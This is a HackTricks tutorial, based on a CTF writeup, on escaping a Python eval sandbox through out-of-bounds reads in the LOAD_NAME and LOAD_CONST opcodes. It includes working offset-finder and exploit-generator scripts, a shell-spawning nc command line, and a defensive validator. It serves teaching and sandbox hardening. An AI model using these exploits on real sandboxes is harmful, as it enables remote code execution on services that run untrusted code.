LOAD_NAME / LOAD_CONST opcode OOB Read
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
This info was taken from this writeup.
TL;DR
We can use the out-of-bounds (OOB) read in the LOAD_NAME / LOAD_CONST opcodes to pull symbols out of nearby memory. In practice this means using a trick like (a, b, c, ... hundreds of symbols ..., __getattribute__) if [] else [].__getattribute__(...) to obtain whichever symbol (such as a function name) you want.
Then just craft your exploit.
Overview
The source code is pretty short: it contains only 4 lines!
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))
You can input arbitrary Python code, and it will be compiled into a Python code object. However, co_consts and co_names of that code object are replaced with empty tuples before the code object is passed to eval.
As a result, any expression that contains constants (e.g. numbers, strings) or names (e.g. variables, functions) may end in a segmentation fault.
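To see the mismatch without executing anything, the sketch below compiles a small expression, strips the tables the same way the challenge does, and lists the operands that no longer have a backing entry. The helper name dangling_loads is made up for this illustration, and nothing here evaluates the stripped code object.

```python
import dis

def dangling_loads(source):
    """Return (opname, index) pairs that have no table entry once co_names is emptied."""
    code = compile(source, "<demo>", "eval")
    stripped = code.replace(co_consts=(), co_names=())
    # replace() swaps the tables but leaves the bytecode untouched
    assert stripped.co_code == code.co_code
    dangling = []
    # Disassemble the ORIGINAL object: dis resolves operands through the
    # tables, so it would raise IndexError on the stripped one.
    for ins in dis.get_instructions(code):
        if ins.opname == "LOAD_NAME" and ins.arg >= len(stripped.co_names):
            dangling.append((ins.opname, ins.arg))
    return dangling

print(dangling_loads("[a, b, c]"))
```

Every LOAD_NAME in the expression ends up in the list, because an empty tuple has no valid index at all.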
Out of Bound Read
How does the segfault happen?
Let's start with a simple example: [a, b, c] compiles into the following bytecode.
  1           0 LOAD_NAME                0 (a)
              2 LOAD_NAME                1 (b)
              4 LOAD_NAME                2 (c)
              6 BUILD_LIST               3
              8 RETURN_VALUE
But what if co_names becomes an empty tuple? The LOAD_NAME 2 opcode is still executed, and it tries to read the value from the memory address where that entry would originally have been. Yes, this is an out-of-bounds read "feature".
The core concept of the solution is simple. Some CPython opcodes, for example LOAD_NAME and LOAD_CONST, are vulnerable (?) to OOB reads.
They retrieve an object at index oparg from the consts or names tuple (that is what co_consts and co_names are called under the hood). The following short snippet shows what CPython does when it processes the LOAD_CONST opcode.
case TARGET(LOAD_CONST): {
    PREDICTED(LOAD_CONST);
    PyObject *value = GETITEM(consts, oparg);
    Py_INCREF(value);
    PUSH(value);
    FAST_DISPATCH();
}
In this way we can use the OOB feature to get a "name" from an arbitrary memory offset. To find out which name sits at which offset, just keep trying LOAD_NAME 0, LOAD_NAME 1 ... LOAD_NAME 99 ... You should find something at around oparg > 700. You can of course also use gdb to inspect the memory layout, but I don't think that would be any easier.
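The unchecked lookup can be pictured with a toy model. This is only an analogy in pure Python, not CPython's real memory layout: the flat HEAP list, the ToyTuple class and both lookup helpers are invented for the illustration. It assumes the behaviour shown in the snippet above, where the item array is indexed without comparing oparg against the tuple length.

```python
# Toy model: a flat list stands in for process memory.
# The empty tuple's item array "starts" at slot 0 but owns none of the slots;
# everything in HEAP belongs to unrelated neighbouring objects.
HEAP = ["some_object", "another_object", "__getattribute__"]

class ToyTuple:
    def __init__(self, base, length):
        self.base = base      # where the item array starts in HEAP
        self.length = length  # number of items the tuple really owns

def checked_getitem(t, i):
    """What a bounds-checked lookup would do."""
    if not 0 <= i < t.length:
        raise IndexError("tuple index out of range")
    return HEAP[t.base + i]

def unchecked_getitem(t, i):
    """Index the item array directly, trusting the operand."""
    return HEAP[t.base + i]

empty_names = ToyTuple(base=0, length=0)

print(unchecked_getitem(empty_names, 2))  # hands back a neighbour's object
try:
    checked_getitem(empty_names, 2)
except IndexError as exc:
    print("checked lookup refused:", exc)
```

In the model, brute-forcing oparg corresponds to walking HEAP until a useful string shows up.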
Generating the Exploit
Once we have retrieved the useful offsets for names / consts, how do we get a name / const from that offset and use it? Here is a trick:
Let's assume we can get a __getattribute__ name from offset 5 (LOAD_NAME 5) with co_names=(); then just do the following:
[a,b,c,d,e,__getattribute__] if [] else [
    [].__getattribute__
    # you can get the __getattribute__ method of list object now!
]
Note that it is not necessary to name it __getattribute__; you can give it a shorter or weirder name.
You can understand the reason by looking at its bytecode:
        0 BUILD_LIST               0
        2 POP_JUMP_IF_FALSE       20
>>      4 LOAD_NAME                0 (a)
>>      6 LOAD_NAME                1 (b)
>>      8 LOAD_NAME                2 (c)
>>     10 LOAD_NAME                3 (d)
>>     12 LOAD_NAME                4 (e)
>>     14 LOAD_NAME                5 (__getattribute__)
       16 BUILD_LIST               6
       18 RETURN_VALUE
       20 BUILD_LIST               0
>>     22 LOAD_ATTR                5 (__getattribute__)
       24 BUILD_LIST               1
       26 RETURN_VALUE
Note that LOAD_ATTR also retrieves its name from co_names. Python loads a name from the same offset whenever the name is the same, so the second __getattribute__ is still loaded from offset=5. Using this feature, we can use an arbitrary name once that name is in nearby memory.
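The index sharing is easy to confirm on an unmodified code object. The check below is a sketch that only inspects compiler output and never runs the expression; the placeholder name x stands in for whatever symbol you are targeting.

```python
import dis

source = "[a, b, c, d, e, x] if [] else [].x"
code = compile(source, "<demo>", "eval")

# Each distinct identifier gets exactly one slot, in order of first appearance.
print(code.co_names)  # ('a', 'b', 'c', 'd', 'e', 'x')

# Both the variable load and the attribute load resolve to the name "x".
users = [ins.opname for ins in dis.get_instructions(code) if ins.argval == "x"]
print(users)
```

Because the padding names a to e occupy slots 0 to 4, x lands in slot 5 for both instructions; adding or removing padding names moves it to any slot you need.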
Generating numbers is straightforward:
- 0: not [[]]
- 1: not []
- 2: (not []) + (not [])
- ...
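A small helper makes this concrete. The sketch below builds such an expression for any non-negative integer and checks that the compiled code needs neither constants nor names; the function name number_expr is an assumption for illustration, and the encoding mirrors the one used by the generator script later on this page.

```python
import dis

def number_expr(n):
    """Build an expression equal to n using only list literals and `not`."""
    if n == 0:
        return "(not[[]])"  # a non-empty list is truthy, so this is False (== 0)
    return "(" + "+".join(["(not[])"] * n) + ")"  # each (not[]) is True (== 1)

for n in (0, 1, 2, 5):
    expr = number_expr(n)
    code = compile(expr, "<demo>", "eval")
    opnames = {ins.opname for ins in dis.get_instructions(code)}
    # No constants and no names are required, so emptying the tables is harmless here.
    assert "LOAD_CONST" not in opnames and code.co_names == ()
    print(n, expr, eval(code, {"__builtins__": {}}))
```

The price is length: each unit costs 8 characters, which matters under the 13337-character limit of the challenge.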
Exploit Script
I didn't use consts due to the length limit.
First, here is a script to find the offsets of those names.
from types import CodeType
from opcode import opmap
from sys import argv


class MockBuiltins(dict):
    # Echo back the name being looked up, so the result of LOAD_NAME
    # shows which string object sits at the probed index
    def __getitem__(self, k):
        if type(k) == str:
            return k


if __name__ == '__main__':
    n = int(argv[1])

    code = [
        *([opmap['EXTENDED_ARG'], n // 256]
          if n // 256 != 0 else []),
        opmap['LOAD_NAME'], n % 256,
        opmap['RETURN_VALUE'], 0
    ]

    c = CodeType(
        0, 0, 0, 0, 0, 0,
        bytes(code),
        (), (), (), '<sandbox>', '<eval>', 0, b'', ()
    )

    ret = eval(c, {'__builtins__': MockBuiltins()})
    if ret:
        print(f'{n}: {ret}')

# for i in $(seq 0 10000); do python find.py $i ; done
And the following script generates the actual Python exploit.
import sys
import unicodedata


class Generator:
    # get number
    def __call__(self, num):
        if num == 0:
            return '(not[[]])'
        return '(' + ('(not[])+' * num)[:-1] + ')'

    # get string
    def __getattribute__(self, name):
        try:
            offset = None.__dir__().index(name)
            return f'keys[{self(offset)}]'
        except ValueError:
            offset = None.__class__.__dir__(None.__class__).index(name)
            return f'keys2[{self(offset)}]'


_ = Generator()

names = []
chr_code = 0
for x in range(4700):
    while True:
        chr_code += 1
        char = unicodedata.normalize('NFKC', chr(chr_code))
        if char.isidentifier() and char not in names:
            names.append(char)
            break

offsets = {
    "__delitem__": 2800,
    "__getattribute__": 2850,
    '__dir__': 4693,
    '__repr__': 2128,
}

variables = ('keys', 'keys2', 'None_', 'NoneType',
             'm_repr', 'globals', 'builtins',)

for name, offset in offsets.items():
    names[offset] = name

for i, var in enumerate(variables):
    assert var not in offsets
    names[792 + i] = var

source = f'''[
({",".join(names)}) if [] else [],
None_ := [[]].__delitem__({_(0)}),
keys := None_.__dir__(),
NoneType := None_.__getattribute__({_.__class__}),
keys2 := NoneType.__dir__(NoneType),
get := NoneType.__getattribute__,
m_repr := get(
    get(get([],{_.__class__}),{_.__base__}),
    {_.__subclasses__}
)()[-{_(2)}].__repr__,
globals := get(m_repr, m_repr.__dir__()[{_(6)}]),
builtins := globals[[*globals][{_(7)}]],
builtins[[*builtins][{_(19)}]](
    builtins[[*builtins][{_(28)}]](), builtins
)
]'''.strip().replace('\n', '').replace(' ', '')

print(f"{len(source) = }", file=sys.stderr)
print(source)

# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
It basically does the following; the strings it needs are obtained from the __dir__ method:
getattr = (None).__getattribute__('__class__').__getattribute__
builtins = getattr(
    getattr(
        getattr(
            [].__getattribute__('__class__'),
            '__base__'),
        '__subclasses__'
    )()[-2],
    '__repr__').__getattribute__('__globals__')['builtins']
builtins['eval'](builtins['input']())
Version notes and affected opcodes (Python 3.11–3.13)
- CPython bytecode opcodes still index into the co_consts and co_names tuples by integer operands. If an attacker can force these tuples to be empty (or smaller than the maximum index used by the bytecode), the interpreter will read out-of-bounds memory for that index, yielding an arbitrary PyObject pointer from nearby memory. Relevant opcodes include at least:
  - LOAD_CONST consti → reads co_consts[consti].
  - LOAD_NAME namei, STORE_NAME, DELETE_NAME, LOAD_GLOBAL, STORE_GLOBAL, IMPORT_NAME, IMPORT_FROM, LOAD_ATTR, STORE_ATTR → read names from co_names[...]. Note that LOAD_GLOBAL (since 3.11) and LOAD_ATTR (since 3.12) store a flag in the low bit of the operand, so the actual index is namei >> 1. See the disassembler docs for exact semantics per version. [Python dis docs]
- Python 3.11+ introduced adaptive/inline caches that add hidden CACHE entries between instructions. This doesn’t change the OOB primitive; it only means that if you handcraft bytecode, you must account for those cache entries when building co_code.
Practical implication: the technique in this page continues to work on CPython 3.11, 3.12 and 3.13 when you can control a code object (e.g., via CodeType.replace(...)) and shrink co_consts/co_names.
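Both version notes can be checked against whatever interpreter you are running. The sketch below is an illustration rather than a complete decoder: name_index and hidden_cache_units are hypothetical helper names, the version cut-offs follow the dis documentation (LOAD_GLOBAL flag bit since 3.11, LOAD_ATTR since 3.12), and opcodes that use other encodings, such as LOAD_SUPER_ATTR, are deliberately ignored.

```python
import dis
import sys

def name_index(opname, arg):
    """Map a raw operand to its co_names index for the running CPython version."""
    if opname == "LOAD_GLOBAL" and sys.version_info >= (3, 11):
        return arg >> 1
    if opname == "LOAD_ATTR" and sys.version_info >= (3, 12):
        return arg >> 1
    return arg

def hidden_cache_units(code):
    """Count 2-byte units in co_code that dis does not report as instructions."""
    return len(code.co_code) // 2 - len(list(dis.get_instructions(code)))

def sample():
    return len.__name__  # compiles to LOAD_GLOBAL followed by LOAD_ATTR

code = sample.__code__
for ins in dis.get_instructions(code):
    if ins.opname in ("LOAD_GLOBAL", "LOAD_ATTR"):
        idx = name_index(ins.opname, ins.arg)
        print(ins.opname, "raw arg", ins.arg, "-> co_names index", idx, code.co_names[idx])

print("hidden cache units:", hidden_cache_units(code))
```

On interpreters older than 3.11 the raw operand and the index coincide and the cache count is zero; on newer ones the same script shows the shifted operands and the extra units that handcrafted co_code has to reproduce.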
Quick scanner for useful OOB indexes (3.11+/3.12+ compatible)
If you prefer to probe for interesting objects directly from bytecode rather than from high-level source, you can generate minimal code objects and brute force indices. The helper below automatically inserts inline caches when needed.
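import dis

def ncache(opname):
    # Number of inline cache entries that follow an opcode (0 before 3.11).
    # dis._inline_cache_entries is a private table: depending on the version
    # it is a list indexed by opcode number or a dict keyed by opcode name.
    table = getattr(dis, "_inline_cache_entries", None)
    if isinstance(table, dict):
        return table.get(opname, 0)
    return table[dis.opmap[opname]] if table else 0

def assemble(ops):
    # ops: list of (opname, arg) pairs; arg must fit in one byte (0..255)
    cache = bytes([dis.opmap.get("CACHE", 0), 0])
    out = bytearray()
    for op, arg in ops:
        out += bytes([dis.opmap[op], arg])
        # Python >=3.11 inserts per-opcode inline cache entries
        out += cache * ncache(op)
    return bytes(out)

# Reuse an existing function's code layout to simplify CodeType construction
base = (lambda: None).__code__

# Example: probe co_consts[i] with LOAD_CONST i and return it
# co_consts/co_names are intentionally empty so LOAD_* goes OOB
def probe_const(i):
    code = assemble([
        ("RESUME", 0),  # 3.11+
        ("LOAD_CONST", i),
        ("RETURN_VALUE", 0),
    ])
    c = base.replace(co_code=code, co_consts=(), co_names=())
    try:
        return eval(c)
    except Exception:
        return None

# One-byte operands only. A bad pointer crashes the interpreter instead of
# raising, so the try/except above cannot catch every failure.
for idx in range(256):
    obj = probe_const(idx)
    if obj is not None:
        print(idx, type(obj), repr(obj)[:80])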
Notes
- To probe names instead, swap LOAD_CONST for LOAD_NAME/LOAD_GLOBAL/LOAD_ATTR and adjust your stack usage accordingly.
- Use EXTENDED_ARG or multiple bytes of arg to reach indexes >255 if needed. When building with dis as above, you only control the low byte; for larger indexes, construct the raw bytes yourself or split the attack across multiple loads.
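For operands above 255, one way to build the raw bytes is sketched below. The helper names encode and decode are hypothetical; the encoding assumes CPython's two-byte instruction format, where each EXTENDED_ARG prefix contributes eight higher bits to the operand of the instruction that follows. Inline cache entries are not handled here.

```python
from opcode import opmap

EXTENDED_ARG = opmap["EXTENDED_ARG"]

def encode(opname, arg):
    """Encode one instruction, adding EXTENDED_ARG prefixes for operands above 255."""
    if not 0 <= arg < 2**32:
        raise ValueError("operand must fit in 32 bits")
    out = bytearray()
    for shift in (24, 16, 8):
        if arg >> shift:  # some byte at or above this position is non-zero
            out += bytes([EXTENDED_ARG, (arg >> shift) & 0xFF])
    out += bytes([opmap[opname], arg & 0xFF])
    return bytes(out)

def decode(raw):
    """Inverse of encode(): fold EXTENDED_ARG prefixes back into (opcode, arg) pairs."""
    ext = 0
    for i in range(0, len(raw), 2):
        op, arg = raw[i], raw[i + 1] | ext
        if op == EXTENDED_ARG:
            ext = arg << 8
        else:
            ext = 0
            yield op, arg

raw = encode("LOAD_NAME", 792)  # 792 == 3 * 256 + 24
print(list(raw))
print(list(decode(raw)))
```

Index 792 needs a single prefix carrying the high byte 3, followed by LOAD_NAME with the low byte 24.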
Minimal bytecode-only RCE pattern (co_consts OOB → builtins → eval/input)
Once you have identified a co_consts index that resolves to the builtins module, you can reconstruct eval(input()) without any co_names by manipulating the stack:
# Build co_code that:
# 1) LOAD_CONST <builtins_idx> → push builtins module
# 2) Use stack shuffles and BUILD_TUPLE/UNPACK_EX to peel strings like 'input'/'eval'
# out of objects living nearby in memory (e.g., from method tables),
# 3) BINARY_SUBSCR to do builtins["input"] / builtins["eval"], CALL each, and RETURN_VALUE
# This pattern is the same idea as the high-level exploit above, but expressed in raw bytecode.
This approach is useful in challenges that give you direct control over co_code while forcing co_consts=() and co_names=() (e.g., BCTF 2024 “awpcode”). It avoids source-level tricks and keeps payload size small by leveraging bytecode stack ops and tuple builders.
Defensive checks and mitigations for sandboxes
If you are writing a Python “sandbox” that compiles/evaluates untrusted code or manipulates code objects, do not rely on CPython to bounds-check tuple indexes used by bytecode. Instead, validate code objects yourself before executing them.
Practical validator (rejects OOB access to co_consts/co_names)
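import dis
import sys
from types import CodeType

NAME_OPS = {"LOAD_NAME", "STORE_NAME", "DELETE_NAME", "IMPORT_NAME", "IMPORT_FROM",
            "STORE_ATTR", "LOAD_ATTR", "LOAD_GLOBAL", "STORE_GLOBAL", "DELETE_GLOBAL"}

def iter_opargs(code):
    # Decode raw co_code directly: dis.get_instructions() resolves operands
    # through co_consts/co_names and raises IndexError on exactly the
    # malformed objects we want to report.
    ext = 0
    raw = code.co_code
    for i in range(0, len(raw) - 1, 2):
        op, arg = raw[i], raw[i + 1] | ext
        ext = arg << 8 if op == dis.opmap["EXTENDED_ARG"] else 0
        yield op, arg

def max_name_index(code):
    max_idx = -1
    for op, namei in iter_opargs(code):
        opname = dis.opname[op]
        if opname in NAME_OPS:
            # LOAD_GLOBAL (3.11+) and LOAD_ATTR (3.12+) encode a flag in the low bit
            if (opname == "LOAD_GLOBAL" and sys.version_info >= (3, 11)) or \
               (opname == "LOAD_ATTR" and sys.version_info >= (3, 12)):
                namei >>= 1
            max_idx = max(max_idx, namei)
    return max_idx

def max_const_index(code):
    # dis.hasconst lists every opcode that indexes co_consts on this version
    return max([arg for op, arg in iter_opargs(code) if op in dis.hasconst] + [-1])

def validate_code_object(code: CodeType):
    if max_const_index(code) >= len(code.co_consts):
        raise ValueError("Bytecode refers to const index beyond co_consts length")
    if max_name_index(code) >= len(code.co_names):
        raise ValueError("Bytecode refers to name index beyond co_names length")

# Example use in a sandbox:
# src = input(); c = compile(src, '<sandbox>', 'exec')
# c = c.replace(co_consts=(), co_names=())  # if you really need this, validate first
# validate_code_object(c)
# eval(c, {'__builtins__': {}})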
Additional mitigation ideas
- Don’t allow arbitrary CodeType.replace(...) on untrusted input, or add strict structural checks on the resulting code object.
- Consider running untrusted code in a separate process with OS-level sandboxing (seccomp, job objects, containers) instead of relying on CPython semantics.
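As a rough illustration of the second idea, the sketch below evaluates an expression in a child interpreter so that a crash or hang only takes down the child. It is an assumption-laden example, not a sandbox: the function name run_isolated and the 5-second timeout are arbitrary, and process separation alone does not restrict what the child can do, so the OS-level controls mentioned above still have to be layered on top.

```python
import subprocess
import sys

# Code run by the child: read one expression from stdin and evaluate it.
CHILD = "import sys; print(eval(sys.stdin.read(), {'__builtins__': {}}))"

def run_isolated(expr, timeout=5):
    """Evaluate expr in a separate interpreter; return (returncode, stdout)."""
    proc = subprocess.run(
        [sys.executable, "-I", "-c", CHILD],  # -I: isolated mode (ignores env vars and user site)
        input=expr, capture_output=True, text=True, timeout=timeout,
    )
    # On POSIX, a negative return code means the child was killed by a signal,
    # which is how an interpreter segfault would show up in the parent.
    return proc.returncode, proc.stdout.strip()

print(run_isolated("(not[])+(not[])"))
```

The parent only sees an exit status and captured output, so a segfault caused by a malformed code object becomes a non-zero return code rather than a crash of the service itself.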
References
- Splitline’s HITCON CTF 2022 writeup “V O I D” (origin of this technique and high-level exploit chain): https://blog.splitline.tw/hitcon-ctf-2022/
- Python disassembler docs (indices semantics for LOAD_CONST/LOAD_NAME/etc., and 3.11+ LOAD_ATTR/LOAD_GLOBAL low-bit flags): https://docs.python.org/3.13/library/dis.html